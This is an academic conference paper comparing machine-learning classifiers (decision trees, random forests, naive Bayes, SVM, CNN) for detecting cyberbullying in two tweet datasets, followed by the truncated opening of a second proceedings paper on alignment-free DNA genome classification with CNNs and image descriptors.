Abstract. Technology advancement has resulted in a serious problem called cyberbullying. Bullying someone online, typically by sending ominous or threatening messages, is known as cyberbullying. On social networking sites, Twitter in particular is evolving into a venue for this kind of bullying. Machine learning (ML) algorithms have been widely used to detect cyberbullying by using particular language patterns that bullies use to attack their victims. Text Sentiment Analysis (SA) can provide beneficial features for identifying harmful or abusive content. The goal of this study is to create and refine an efficient method that utilizes SA and language models to detect cyberbullying from tweets. Various machine learning algorithms are analyzed and compared over two datasets of tweets. In this research, we have employed two different datasets of different sizes of tweets in our investigations. On both datasets, Convolutional Neural Network classifiers that are based on higher n-grams language models have outperformed other ML classifiers; namely, Decision Trees, Random Forest, Naïve Bayes, and Support-Vector Machines. Keywords: Cyberbullying detection · Machine learning sentiment analysis
1 Introduction The number of active USA social media users in 2022 is about 270 million (81% of the USA’s total population) of which 113 million of them are Twitter users [1]. As a result, social media has quickly changed how we obtain information and news, shop, etc. in our daily lives. Furthermore, Fig. 1 illustrates that by 2024, there will be over 340 million active Twitter users worldwide [2]. According to the age group, Fig. 2 shows the percentage of USA active Twitter users in August 2022, where 38% of adults between the ages of 18 and 29 are active Twitter users during that time [3]. Given how frequently young adults use online media, cyberbullying and other forms of online hostility have proven to be major problems for users of web-based media. As a result, there are more and more digital casualties who have suffered physically, mentally, or emotionally.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 25–38, 2023. https://doi.org/10.1007/978-3-031-28073-3_3
26
J. O. Atoum
Fig. 1. Number of twitter users.
40%
StaƟsƟcs of USA acƟve TwiƩer Users by Age
35% 30% 25% 20% 15% 10% 5% 0% 18-29
30-49
50-64
65+
Fig. 2. Percentage of USA twitter active users by age as of Aug. 2022.
Cyberbullying is a form of provocation that takes place online on social media platforms. Criminals rely on these networks to obtain information and data that will enable them to carry out their wrongdoings. In addition, cyberbullying victims have a high propensity for mental and psychiatric diseases as indicated by the American Academy of Child and Adolescent Psychiatry claims [4]. Suicides have been connected to cyberbullying in severe circumstances [5, 6]. The prevalence of the phenomena is shown in Fig. 3, which displays survey data gathered from student respondents. These details demonstrate the substantial health risk that cyberbullying poses [7]. Consequently, researchers have exerted so much effort to identify methods and tactics that would detect and prevent cyberbullying. Monitoring systems for cyberbullying have received a lot of attention recently, and their main objective is to quickly find instances of cyberbullying [8]. The framework’s key concept is the extraction of specific aspects
Detecting Cyberbullying from Tweets Through Machine Learning
27
Fig. 3. Survey statistics on cyberbullying experiences.
from web-based media communications, followed by the construction of classifier algorithms to identify cyberbullying based on these retrieved features. These traits could be influenced by content, emotion, users, and social networks. ML or filtration techniques have been used most frequently in studies on detecting cyberbullying. Profane phrases or idioms must be found in texts using filtration techniques in order to detect cyberbullying [9]. Filteration strategies typically make use of ML techniques to create classifiers that can spot cyberbullying using data corpora gathered from social networks like Facebook and Twitter. As an illustration, data were obtained from Formspring and utilizing the Amazon Mechanical TURK for labelling [10]. Additionally, WEKA [11] is a collection of ML tools used to test various ML approaches. These approaches have failed to discriminate between direct and indirect linguistic harassment [12]. In order to identify potential bullies, Chen [13] suggested a technique to separate hostile language constructions from social media by looking at characteristics associated with the clients’ writing styles, structures, and specific cyberbullying material. The main technique applied in this study is a lexical syntactic component that was effective and capable to distinguish hostile content from communications given by bullies. Their results revealed a remarkable precision rate of 98.24% and recall of 94.34%. An approach for identifying cyberbullying by Nandhini and Sheeba [14] was based on a Naïve Bayes (NB) classifier and information gleaned from MySpace. They had reported a 91% accomplished precision. A better NB classifier was used by Romsaiyud el A. in [15] to separate cyberbullying terms and group piled samples. Utilizing a corpus from Kongregate, MySpace, and Slashdot, they were able to achieve a precision of 95.79%. Based on our earlier research [16], which used the Sentiments Analysis (SA) technique to categorize tweets as either positive, negative, or neural cyberbullying, we are investigating and evaluating different machine learning algorithms based on classifiers models, namely; Decision Tree (DT), Naïve Bayes (NB), Random Forest (RF), Support
28
J. O. Atoum
Vector Machine (SVM), and Convolutional Neural Networks (CNN). We will conduct this investigation and evaluation by performing various experiments on two different datasets of tweets. In addition, we will use some language models (Normalization, Tokenization, Named Entity recognition (NER), and Stemming) to enhance the classification process. The context for this research is presented in Sect. 2. The suggested model for sentiment analysis of tweets is presented in Sect. 3. The experiments and findings of the suggested model are presented in Sect. 4. The results of this study are presented in Sect. 5 as a final section.
2 Background Artificial intelligence (AI) applications such as Machine Learning (ML) enable systems to automatically learn from their experiences and advance without explicit programming. ML algorithms are usually divided into supervised and unsupervised categories. In order to anticipate future events, supervised ML algorithms use labeled examples and past knowledge to analyze incoming data. Starting from the analysis of a well-known training dataset, the learning algorithm constructs an inferred function to predict the values of the outputs. Unsupervised ML is used when the input data is unlabeled or uncharacterized. Unsupervised learning looks into the possibility that systems could infer a function from unlabeled data to explain a hidden structure. Lastly, researchers have applied supervised learning techniques to data discovered via freely accessible corpora [17]. The cyberbullying detection framework consists of two main components as depicted in Fig. 5. NLP (Natural Language Processing), and ML (machine learning). The first stage involves gathering and employing natural language processing to prepare datasets of tweets for machine learning algorithms. The machine learning algorithms are then trained to find any harassing or bullying remarks from the tweets using the processed datasets. 2.1 Natural Language Processing An actual tweet or text may contain a number of extraneous characters or lines of text. For instance, punctuation or numbers have no bearing on the detection of bullying. We need to clean and prepare the tweets for the detection phase before applying the machine learning techniques to them. In this stage, various processing tasks are performed, such as tokenization, stemming, and the elimination of any unnecessary characters including stop words, punctuation, and digits. Collecting Tweets: To collect the tweets from Twitter, an application was created. After the hashtag, each tweet needs to have the feature words—words that tell the user whether it is a good, bad, or neutral cyberbullying tweet—extracted. The extraction of tweets is necessary for the analysis of the features vector and selection process (unigrams, bigrams, trigrams, etc.), as well as the classification of both the training and testing sets of tweets.
Detecting Cyberbullying from Tweets Through Machine Learning
29
Cleaning and Annotations of Tweets: Tweets may include unique symbols and characters that cause them to be classified differently from how the authors intended. Therefore, all special symbols, letters, and emoticons must be removed from the collected tweets. Also crucial to the classification process is the replacement of such unique symbols, feelings, and emotional characteristics with their meanings. Figure 4 lists several unique symbols we’ve used together with their meanings and sentiments. The procedure of annotating the compiled tweets is done manually. Each tweet is given a cyberbullying label—positive, negative, or neutral—as a result of this annotation. Normalization: There is a list of all non-standard words that contain dates or numerals. In particular built-in vocabularies, these terms would be mapped. As a result, there are fewer tweet vocabularies and the classification process is performed with greater precision. While testing tweet collections, tweet extraction is necessary. Tokenization: Tokenization, which lessens word typographical variance, is a crucial stage in SA. Tokenization is necessary for both the feature extraction procedure and the bag of words. Words are converted into feature vectors or feature indices using a dictionary of features, and their index in the vocabulary is connected to their frequency over the entire training corpus. Named Entity Recognition (NER): Named Entity Recognition can be used to find the proper nouns in an unstructured text (NER). The three types of name entities in NER are ENAMEX (person, organization, and country), TIMEX (date and time), and NUMEX (percentages and numbers). Removing Stop Words: Some stop words can aid in conveying a tweet’s entire meaning, while others are merely superfluous characters that should be deleted. Stop words like “a”, “and”, “but”, “how”, “or”, and “what” are a few examples. These stop words don’t change a tweet’s meaning and can be omitted. Stemming: When stemming tweets, words are stripped of any suffixes, prefixes, and/or infixes that may have been added. A word that has been stemmed conveys a deeper meaning than the original word and may also result in storage savings [18]. Tweets that are stemmed are reduced to the stems, bases, or roots of any derivative or inflected words. Additionally, stemming assists in combining all of a word’s variations into a single bucket, effectively reducing entropy and providing better concepts for the data. Additionally, the N-gram is a traditional technique that may detect formal phrases by looking at the frequency of N-words in a tweet [19]. Hence, we employed the N-gram in our SA as a result. For the purpose of stemming, Weka [11] was used in this study to implement the term (word) frequency. Term frequency applies weights to each term in a document based on how many times the term appears in the document. It produces the keywords that appear more frequently in tweets more weight because these terms indicate words and linguistic patterns that are more frequently used by tweeters.
30
J. O. Atoum
Fig. 4. Some special tweets symbols and their meanings.
Feature Selection: Techniques for feature selection have been effectively applied in SAs [20]. When features are ranked according to certain criteria, unhelpful or uninformative features are eliminated to increase the precision and effectiveness of the classification process. To exclude such unimportant features from this investigation, we applied the Chi-square and information gain strategies. Sentiment Analysis: Sentiment analysis (SA) classifiers are often based on projected classes and polarity, as well as the level of categorization (sentence or document). Semantic orientation polarity and strength are annotated via lexicon-based SA text extraction. SA demonstrated how useful light stemming is for classification performance and accuracy [21].
2.2 Machine Learning Algorithms There are several machine learning algorithms used in this study to build classifier models to detect cyberbullying from tweets are explained in this subsection. Decision Trees: Classification can be done using the Decision Tree (DT) classifier [22]. It can both assist in making a decision and in representing that decision. In a decision tree, each leaf node denotes a choice, and each internal node denotes a condition. A classification tree provides the target’s class to which it belongs. The predicted value for a particular input is produced using a regression tree. Random Forest: Multiple decision tree classifiers make up the Random Forest (RF) classifier [23]. A distinct class prediction is provided by each tree. Our ultimate finding is
Detecting Cyberbullying from Tweets Through Machine Learning
31
the maximum number of the projected class. This classifier is a supervised learning model that yields correct results because the output is created by combining numerous decision trees. Instead of relying on a single decision tree, the random forest uses forecasts from each created tree and selects the outcome based on the majority votes of predictions. For instance, if a decision tree predicts the class label B for any instance out of two classes, A and B, then RF will choose the class label B as follows: f(x) = majority vote of all trees as B Naive Bayes: Naive Bayes (NB) classifiers are a family of simple “probabilistic classifiers” based on applying Bayes’ theorem with strong (naive) independence assumptions between the features. NB classifiers are used as supervised learning models. When presenting a document, NB frequently uses the “bag of words” method, gathering the most frequently used terms while ignoring less frequently used ones. The feature extraction approach is dependent on the bag of words to classify some data. Additionally, NB contains a language modeling feature that separates each text into representations of unigrams, bigrams, or n-grams and assesses the likelihood that a given query will match a certain document [24]. Support-Vector Machine (SVM): Another supervised learning model with a learning algorithm is the SVM, which examines the data used for classification and regression. An SVM training algorithm creates a model that categorizes incoming examples according to one of two categories given a set of training examples, making them non-probabilistic binary linear classifiers (although there are ways to apply SVM in a probabilistic classification situation, such as Platt scaling) [25]. Linear and Radial Basis Function models are crucial for SVM text categorization. The dataset is often trained for linear classification before a classification or categorization model is created. The features are shown as points in space that are anticipated to belong to one of the designated classes. SVM performs well in a variety of classification tasks, but it is most frequently used for text and image recognition [25]. Convolutional Neural Network (CNN): A software solution known as a neural network uses algorithms to “clone” the functions of the human brain. In comparison to conventional computers, neural networks process data more quickly and have better abilities for pattern detection and problem-solving. Neural network techniques have generally surpassed a number of contemporary techniques in machine translation, image recognition, and speech recognition. It’s possible that it will also perform better than other methods in developing classifiers for the identification of cyberbullying. This is because neural networks may automatically learn beneficial properties from complex structures from a high-dimensional input set [26]. Shallow classifiers are routinely outperformed by two specific neural network architectures, namely Recurrent Neural Networks (RNN) and Convolutional Neural Networks (CNN) [27, 28]. RNNs process their input one element at a time, such as a word or character, and store a state vector in their hidden units that contain the history of previous elements. Conversely, CNN employs convolutions to identify smaller conjunctions of features from a previous layer to create new feature maps that can be used as input by many layers for classification.
32
J. O. Atoum
A CNN sentence-level classifier has been developed by Kim et al. [29] using pretrained word vectors. The results collected showed an improvement above the stateof-the-art on four out of seven benchmark datasets that incorporate sentiment analysis. Using an unsupervised corpus of 50 million tweets with word embeddings, Severyin and Mochitti [30] presented a pre-trained CNN architecture. The findings showed that it would place first on a phrase-level on the Twitter15 dataset of SemEval 2015The Very Deep-CNN classifier was created by Conneau et al. in [31], and it increased performance by using up to 29 convolutional layers of depth and eight publicly available text classification tasks, including sentiment analysis, subject classification, and news categorization.
3 Proposed Tweets SA Model The suggested Twitter bullying detection model, as shown in Fig. 5, employs various stages for analyzing, mining, and categorizing tweets. In order to improve the SA process, the gathered tweets must go through a number of preprocessing processes as discussed in the preceding section. We used the five machine learning algorithms—Decision Tree (DT), Random Forest (RF), Naive Bayes (NB), Support Vector Machines (SVM), and Convolutional Neural Networks—to classify tweets as bullying or nonbullying (CNN). 3.1 Evaluation Measures Several evaluation measures were used in this work to assess the effectiveness of the proposed classifier models in differentiating cyberbullying from non-cyberbullying. Five performance metrics—accuracy, precision, recall, F-measure, and receiver operating characteristics—have been used in this study (ROC). These measures are defined as follows: Accuracy: The percentage of accurate forecasts overall guesses is known as accuracy. Precision: It is the division of the positive cases that are all accurately classified as positive cases (including false positives). Recall (or Sensitivity): Is calculated by dividing all of the real positive cases by the true positives (including false-negative cases). F-Measure: It is the combination of sensitivity and recall. It’s represented by (2 * Precision * Recall)/(Precision + Recall). Receiver Operating Characteristic (ROC): Recall (also known as the true positive rate) and the false-positive rate are plotted on a curve. The area under the ROC curve (AUC) quantifies the total region beneath the curve. The better the categorization model, the higher the AUC.
Detecting Cyberbullying from Tweets Through Machine Learning
33
Fig. 5. Proposed twitter bullying detection model.
3.2 Datasets To evaluate the effectiveness of the machine learning methods used in this investigation; we have gathered two datasets (Dataset-1 and Dataset-2) from Twitter on different dates (one month apart). Table 1 presents the details of these two datasets. Table 1. Datasets tweets statistics
Number of tweets
DataSet-1
Dataset-2
9352
6438
Number of supportive (cyberbullying) tweets
2521
1374
Number of unfavorable (non-cyberbullying) tweets
3942
2347
Number of impartial tweets
2889
2717
4 Experiments and Results Before we could conduct our investigations, the collected tweets had to go through a number of steps, including cleaning, preprocessing, normalization tokenization, named entity recognition, stemming, and including a determination, as was covered in the prior section. The DT, RF, NB, SVM, and CNN classifiers are then trained and tested using a ratio of (70, 30) on this data set. Finally, 10-fold equal-sized sets are created using cross-validation.
34
J. O. Atoum
Numerous experiments have been carried out on the above-mentioned two datasets of collected tweets to analyze and evaluate the DT, RF, NB, SVM, and CNN classifiers. The precision, accuracy, recall, F-measure, and ROC of these classifiers are assessed using tweets with gram sizes of 2, 3, and 4 in the main test. 4.1 Results for Dataset-1 The outcomes of evaluation measures on Dataset-1 are shown in Fig. 6. It highlights the average estimates obtained using several n-gram models for the DT, RF, NB, SVM, and CNN classifiers. This graph demonstrates that CNN classifiers outperformed all other classifiers in all n-gram language models in terms of precision, accuracy, recall, F-measure, and ROC. CNN classifiers, for instance, obtained a 4-g language model accuracy of 93.62% on average, whereas the DT, RF, NB, and SVM classifiers only managed to achieve an average accuracy of 63.2%, 65.9%, 82.3%, and 91.02%, respectively, using the same language model. Additionally, in all tests with all classifiers, the 4-g language model outperformed the remaining n-gram language models. This is because the likelihood of evaluation rises with increasing n-gram. 100 80 60 40 20
Accuracy
Precision 2-gram
Recall 3-gram
CNN
NB
SVM
RF
DT
CNN
NB
SVM
RF
DT
CNN
SVM
NB
RF
DT
CNN
SVM
NB
RF
DT
0
F-Measure
4-gram
Fig. 6. Comparisons of DT, RF, NB, SVM, and CNN measures for dataset-1.
4.2 Results for Dataset-2 Figure 7 displays the results of the same evaluation measures on Dataset-2 using various n-gram models. This Figure proves once more that CNN classifiers outperform all other classifiers in terms of precision, accuracy, recall, F-measure, and ROC in all n-gram language models. In contrast to the DT, RF, NB, and SVM classifiers, which only managed to reach average accuracy of 62.7%, 64.8%, 81.2%, and 89.7%, respectively, using the same language model, CNN was able to achieve an average accuracy of 91.03% utilizing the 4-g language model. Additionally, in all tests conducted with all classifiers (DT, RF, NB, SVM, and others), when compared to all other n-gram language models, the 4-g language model fared better.
Detecting Cyberbullying from Tweets Through Machine Learning
35
4.3 Comparing the Results of Dataset-1 and Dataset2 As can be noticed from Fig. 8, when the findings from the two datasets (Dataset-1 and Dataset-2) are compared, we clearly have slightly better results using Dataset 1 than we did with Dataset-2 for all assessment measures (using the averages of all language models: 2-g, 3-g, and 4-g). This is a result of the fact that Dataset-1 has more tweets (9352 tweets) than Dataset-2, which has a smaller number of tweets (6438 tweets). Thus, it follows that the results are improved by increasing the size of the dataset that is used to train and evaluate machine learning classifiers. Additionally, all ML classifiers perform better utilizing the 4-g language model than the 2-g and 3-g on all assessment criteria, as shown in Fig. 6 and Fig. 7. This is due to the fact that a higher n-gram increases the possibility of evaluation.
100 80 60 40 20 DT RF NB SVM CNN DT RF NB SVM CNN DT RF NB SVM CNN DT RF NB SVM CNN DT RF NB SVM CNN
0
Accuracy
Precision
Recall
2-gram
F-Measure
3-gram
ROC
4-gram
Fig. 7. Comparisons of DT, RF, NB, SVM, and CNN measures for dataset-2.
100 80 60 40 20 0 DT
NB
CNN
Accuracy
RF
SVM
Precision
DT
NB CNN Recall
Dataset-1
RF
SVM
F-Measure
DT
NB
CNN
ROC
Dataset-2
Fig. 8. Comparisons of evaluations measures of dataset-1 and dataset-2.
36
J. O. Atoum
5 Conclusion We have proposed a method to handle the detection of cyberbullying from Twitter that rely on Sentiment Analysis using machine learning techniques, notably Decision Tree (DT), Naive Bayes (NB), Random Forest (RF), Support Vector Machine (SVM), and Convolutional Neural Networks. The two collections of tweets included in this inquiry contain a variety of tweets that have been categorized as cyberbullying in one of three ways: positively, negatively, or neutrally. Before being ready for and tested with these machine learning algorithms, the collected sets of tweets have to go through a number of stages of cleaning, explanations, standardization, tokenization, named element acknowledgment, deleting paused words, stemming and n-gram, and features selection. According to the results of the directed investigations, CNN classifiers performed better than all other classifiers in both datasets’ total language models (2-g, 3-g, and 4-g). On Dataset-1 and Dataset-2, respectively, CNN classifiers achieved average accuracy levels of 93.62 and 91.03. Additionally, CNN classifiers have done better than every other classifier (DT, RF, NB, and SVM) on every other evaluation metric (precision, recall, F-Measures, and ROC). Additionally, by including the 4-g language model in these classifiers, they have produced better results than those obtained with the other language models (2-g and 3-g). Finally, we might want to look into machine learning techniques to identify bullying from other social media sites like Facebook, Instagram, and TikTok for future study on cyberbullying detection. Acknowledgment. I want to express my gratitude to the University of Texas at Dallas for their assistance.
References 1. US Social Media Statistics | US Internet Mobil Stats. https://www.theglobalstatistics.com/uni ted-states-social-media-statistics/. Accessed 05 Aug 2022 2. Cyberbullying Research Center (http://cyberbullying.org/) 3. The 2022 Social Media Demographics Guide. https://khoros.com/resources/social-mediademographics-guide 4. American Academy of Child Adolescent Psychiatry. Facts for families guide. the American academy of child adolescent psychiatry. 2016. http://www.aacap.org/AACAP/Families_and_ Youth/Facts_for_Families/FFF-Guide/FFF-Guide-Home.aspx 5. Goldman, R.: Teens indicted after allegedly taunting girl who hanged herself (2010). http:// abcnews.go.com/Technology/TheLaw/ 6. Smith-Spark, L.: Hanna Smith suicide fuels call for action on ask.fm cyberbullying (2013). http://www.cnn.com/2013/08/07/world/europe/uk-social-media-bullying/ 7. Cyberbullying Research Center. http://cyberbullying.org/). Accessed 06 Aug 2022 8. Salawu, S., He, Y., Lumsden, J.: Approaches to automated detection of cyberbullying: a survey. IEEE Trans. Affect. Comput. 11(1), 3–24 (2020). https://doi.org/10.1109/TAFFC. 2017.2761757 9. Sartor, G., Loreggia, A.: Study: The impact of algorithms for online content filtering or moderation (upload filters). European Parliament (2020)
Detecting Cyberbullying from Tweets Through Machine Learning
37
10. Amaon Mechanical Turk, 15 Aug 2014. http://ocs.aws.amazon.com/AWSMMechTurk/latest/ AWSMechanical-TurkGetingStartedGuide/SvcIntro.html. Accessed 3 July 2020 11. Garner, S.: Weka: the waikato environment for knowledge analysis. In: Proceedings of the New Zealand Computer Science Research Students Conference, pp. 57–64, New Zealand (1995) 12. Nahar, V., Li, X., Pang, C.: An effective approach for cyberbullying detection. Commun. Inf. Sci. Manag. Eng. 3(5), 238 (2013) 13. Chen, Y., Zhou, Y., Zhu, S., Xu, H.: Detecting offensive language in social media to protect adolescent online safety. In: privacy, Security, Risk and Trust (PASSAT), 2012 International Conference on Social Computing (SocialCom), pp. 71–80 (2012) 14. Sri Nandhinia, B., Sheeba, J.I.: Online social network bullying detection using intelligence techniques international conference on advanced computing technologies and applications (ICACTA- 2015). Procedia Comput. Sci. 45, 485–492 (2015) 15. Romsaiyud, W., Nakornphanom, K., Prasertslip, P., Nurarak, P., Pirom, K.: Automated cyberbullying detection using clustering appearance pattern. In: 2017 9th International Conference on Knowledge and Smart Technology (KST), pp. 2–247. IEEE (2017) 16. Atoum, J.O.:Cyberbullying detection neural networks using sentiment analysis. In: 2021 International Conference on Computational Science and Computational Intelligence (CSCI), pp. 158–164 (2021). https://doi.org/10.1109/CSCI54926.2021.00098 17. Bosco, C., Patti, V., Bolioli, A.: Developing corpora for sentiment analysis: the case of Irony and Senti–TUT. In: Proceedings of the Twenty-Fourth International Joint Conference on Artificial Intelligence (IJCAI 2015), pp. 4158–4162 (2015) 18. Rajput, B.S., Khare, N.: A survey of stemming algorithms for information retrieval. IOSR J. Comput. Eng. (IOSR-JCE), 17(3), Ver. VI (May – Jun. 2015), 76–78. e-ISSN: 2278–0661, p-ISSN: 2278–8727 19. Chen, L., Wang, W., Nagaraja, M., Wang, S., Sheth, A.: Beyond positive/negative classification: automatic extraction of sentiment clues from microblogs. Kno.e.sis Center, Technical Report (2011) 20. Fattah, M.A.: A novel statistical feature selection approach for text categorization. J. Inf. Process. Syst. 13, 1397–1409 (2017) 21. Tian, L., Lai, C., Moore, J.D.: Polarity and intensity: the two aspects of sentiment analysis. In: Proceedings of the First Grand Challenge and Workshop on Human Multimodal Language (Challenge-HML), pp. 40–47, Melbourne, Australia 20 July 2018. Association for Computational Linguistics (2018) 22. Safavian, S.R., Landgrebe, D.: A survey of decision tree classifier methodology. IEEE Trans. Syst. Man Cybern. 21(3), 660–674 (1991) 23. Pal, M.: Random forest classifier for remote sensing classification. Int. J. Remote Sens. 26(1), 217–222 (2005) 24. Friedman, N., Geiger, D., Goldszmidt, M.: Bayesian network classifiers. Mach. Learn. 29(2– 3), 131–163 (1997) 25. Cortes, C., Vapnik, V.N.: Support-Vector Networks (PDF). Mach. Learn. 20(3), 273–297 (1995), Cutesier 10.1.1.15.9362. https://doi.org/10.1007/BF00994018 26. LeCun, Y., Bengio, Y., Hinton, G.: Deep learning. Nature 521(7553), 436–444 (2015) 27. Mikolov, T., Corrado, G., Chen, K., Dean, J.: Efficient estimation of word representations in vector space. In: Proceedings of the International Conference on Learning Representations (ICLR 2013), pp. 1–12 (2013) 28. Bengio, Y., Ducharme, R., Vincent, P.: A neural probabilistic language model. J. Mach. Learn. Res. 3, 1137–1155 (2003) 29. Kim, Y.: Convolutional neural networks for sentence classification. In: Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP 2014), pp. 1746–1751 (2014)
38
J. O. Atoum
30. Severyn, A., Moschitti, A.: Twitter sentiment analysis with deep convolutional neural networks. In: Proceedings of the 38th International ACM SIGIR Conference on Research and Development in Information Retrieval - SIGIR 2015, pp. 959–962 (2015) 31. Conneau, H. Schwenk, L.B., Lecun, Y.: Very deep convolutional networks for natural language processing. KI - Kunstliche ¨ Intelligenz 26(4), 357–363 (2016)
DNA Genome Classification with Machine Learning and Image Descriptors Daniel Prado Cussi1(B) and V. E. Machaca Arceda2 1
Universidad Nacional de San Agust´ın, Arequipa, Peru [email protected] 2 Universidad La Salle, Mexico City, Mexico [email protected]
Abstract. Sequence alignment is the most used method in Bioinformatics. Nevertheless, it is slow in time processing. For that reason, there are several methods not based on alignment to compare sequences. In this work, we analyzed Kameris and Castor, two alignment-free methods for DNA genome classification; we compared them against the most popular CNN networks: VGG16, VGG19, Resnet-50, and Inception. Also, we compared them with image descriptor methods like First-order Statistics(FOS), Gray-level Co-occurrence matrix (GLCM), Local Binary Pattern (LBP), and Multi-resolution Local Binary Pattern(MLBP), and classifiers like: Support Vector Machine (SVM), Random Forest (RF) and k-nearest neighbors (KNN). In this comparison, we concluded that FOS, GLCM, LBP, and MLBP, all with SVM got the best results in f1-score, followed by Castor and Kameris and finally by CNNs. Furthermore, Castor got a minor processing time. Finally, according to experiments, 5-mer (used by Kameris and Castor) and 6-mer outperformed 7-mer. Keywords: Alignment-free methods · Frequency chaos game representation · Alignment-based methods · CNN · Kameris · Castor FOS · GLCM · LBP · MLBP
1
·
Introduction
Sequence alignment is a fundamental procedure in Bioinformatics. The method is very important in order to discover similar regions of DNA [15,42]. It has a relevant impact in many applications such as viral classification, phylogenetics analysis, drug discovery, etc. [40]. The main problem in sequence alignment is the high time processing, and memory consumption [19,60]. Moreover, despite the efforts of scientists to develop more efficient algorithms [9,30,56,59]. This problem is not yet resolved. For that reason, there is another approach comparing sequences. It is called alignment-free methods; they use DNA descriptors and machine learning models in order to classify and compare sequences. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 39–58, 2023. https://doi.org/10.1007/978-3-031-28073-3_4
40
D. P. Cussi and V. E. Machaca Arceda
We have used some methods based on k-mers frequency. K-mer has been applied in genome computation, and sequence analysis [46]. In this work, we analyzed two alignment-free methods (Kameris and Castor) against VGG16, VGG19, Resnet-50, Inception, First-order Statistics (FOS), Gray Level Co-occurrence Matrix (GLCM), Local Binary Pattern (LBP), and Multi-resolution local binary pattern (MLBP). This is an extension of a previous work that compared Kameris and Castor against small CNN models [31]. Moreover, we included time processing comparisons in order to show the advantages of alignment-free methods. FOS, LBP , GLCM, and MLBP are image descriptors used in computer vision. So, in this work, they are used to extract information from DNA, and we refer to them like ”image descriptor methods”. The work is structured as follows: In Sect. 2, we present the related works, and Sect. 3 explains the data, materials, and methods used. Section 4 details experiments and results; in Sect. 5, we write the limitations; in Sect. 6, we expose the conclusions and finally, in Sect. 7 we define the future work.
2
Related Work
Alignment-free methods are relevant. For example, in COVID studies, some researchers used DNA descriptors with machine learning models to find a class for the COVID virus. These studies concluded that the virus belongs to Betacoronavirus, inferring that it has origin in bats [14,26]. There are four interesting free alignment methods that are used in multiple fields of bioinformatics: First-Order Statistics (FOS), Gray-level co-occurrence matrix (GLCM), Local-Binary Patterns (LBP), and Multi-resolution LocalBinary Patterns (MLBP). Deliba proposed a new approach to DNA sequence similarity analysis using FOS to calculate the similarity of textures [10]. FOS was useful for the creation of a reliable and effective method, which can be applied to computed tomography (CT) images of COVID-19 obtained from radiographs for the purpose of monitoring the disease [54]. Moreover, FOS was also applied to diagnose the same disease, but without emitting radiation like the computerized tomography, in a developed automated system [17]. One of the most common methods used in image texture analysis is the GLCM [6]. It had relevance in the healthcare field, being part of a novel solution to improve the diagnosis of COVID-19 [3]. Additionally, it was also employed to extract textural features from histopathological images [34]. On the other hand, GLCM and LBP fused served to propose a texture feature extraction technique for volumetric images, where the discrimination is improved concerning works using deep learning networks [4]. Finally, the GLCM features were applied in the problem of automatic online signature verification, concluding that they work optimally with the SVM model for signature verification, having also been tested with other models [49]. In recent years , the LBP feature extraction method, which is responsible for describing the surface texture features [36], has been used in various applications,
DNA Genome Classification
41
making remarkable progress in texture classification [20,43], and facial recognition applications [22,33,47,55]. On the other hand, it has also had relevance in bioinformatics, being used to predict protein-protein interactions [28], or for also, in the prediction of images of subcellular localization of proteins concerning human reproductive tissues [58]. Additionally, an improved version of LBP, called Multiresolution Local Binary Pattern (MLBP), was developed [23]. This version was used to classify normal breast tissue and masses on mammograms, reducing false positive detections in computer-assisted detection of breast masses [7]. The alignment-free methods are able to solve problems in different subjects; for example, Virfinder (alignment-free method) was developed to identify viral sequences using k-mer frequencies [41]. On the other hand, another robust alignment-free method was developed to discriminate between enzymes and nonenzymes, obtaining a remarkable result [8]. In genetics, alignment-free methods have far outperformed alignment-based methods in measuring the closeness between DNA sequences at the data preprocessing stage [46]. Protein sequence similarity is a relevant topic in bioinformatics. A new alignment-free method has been developed to perform similarity analysis between proteins of different species, allowing a global comparison of multiple proteins [12]. They have also had incursions into topics such as the evolutionary relationship that exists between species, such as humans, chimpanzees, and orangutans [37]. These methods can be divided into several categories, one of the most relevant being k-mer frequencies [1], which are sequences of k characters [27], having many applications in metagenomic classification [57], and repeat classification [5]. In recent years, CNNs have become very relevant. For example, Inception-v3, was used to recognize the boundaries between exons and introns [45]. Additionally, it was used to predict cancer skin [44]. Moreover, VGG16, was employed for non-invasive detection of COVID-19 [35] and applied by the PILAE algorithm to achieve better performance in classifying DNA sequences of living organisms [32]. Finally, a method was developed that allows DNA comparisons. The authors transformed the sequences into FCGR images. Then they used SVD. In this project, the method outperformed BLAST [29]. The works mentioned have some small shortcomings, for example in [3,54] the accuracy should be 100% because people’s health is at stake, although the works showed improvements in their proposal. Additionally, in the majority of image descriptor methods, we found very little researches related with dna genoma classification, so we decided compare the four alignment free methods (FOS, GLCM, LBP, and MLBP) with three classifiers like SVM, KNN, and RFC, in this paper, noting that FOS has some interesting characteristics, and SVM classifier showed a good performance [4], because the work will explain with the experiments the comparative. The main idea of the work is try to find new alternatives to the traditional alignment-based methods which are very slow as the data grows. Also, we will make a comparison between all this alignment free methods proposed, with the aim to discover which of these have the better score and better processing time.
42
3
D. P. Cussi and V. E. Machaca Arceda
Materials and Methods
In this section, we describe the method based on CNNs, two alignment-free methods (Kameris and Castor), First-Order Statistics (FOS), Gray Level Cooccurrence Matrix (GLCM), Local binary pattern (LBP), and Multi-resolution local binary pattern (MLBP). 3.1
CNNs and Chaos Game Representation
In order to use CNNs, we need an image; for that reason, we used Frequency Chaos Game Representation (FCGR). FCGR creates images that store the frequencies of k-mers according to the value of k [2,11]. There are several works inspired by FCGR. In our case, we have focused on the so-called IntelligentIcons, proposed by Kumar and Keogh, where these bitmaps provide a very good overview of the values and their sequence in the dataset [21,24]. Then, we used VGG16, VGG19, Resnet-50, and Inception in order to build a classifier. Also, we employed VGG16 , a deep learning architecture with 16 hidden layers composed of 13 convolutional layers and three fully connected. The model achieves 92.7% top-5 test accuracy in ImageNet. Additionally, VGG19 is a variant of VGG16 with more depth [48]. We have also applied Resnet-50, which is a convolutional neural network that is trained on more than one million images from the ImageNet database. The network is 50 layers deep and can classify images into 1000 categories of objects. As a result, the network has learned feature-rich representations for a wide range of images [18]. Finally, we used Inception-v3, a convolutional neural network architecture belonging to the Inception family, developed by Google. The model presents several improvements such as Label Smoothing, 7 × 7 factored convolutions, and the use of an auxiliary classifier to do spread information about the labels at the bottom of the network [52,53]. For data preprocessing, numerical data is sometimes available instead of categorical data. In this case, the genomic sequence of the DNA dataset is categorical, so to transform the categorical data into numerical data, one-hot-encoding is used in our work [16]. For CNN architectures (VGG16, VGG19, Resnet-50, and Inception-v3), we utilized Adam optimizer in all cases, mini-bath size of 32 and 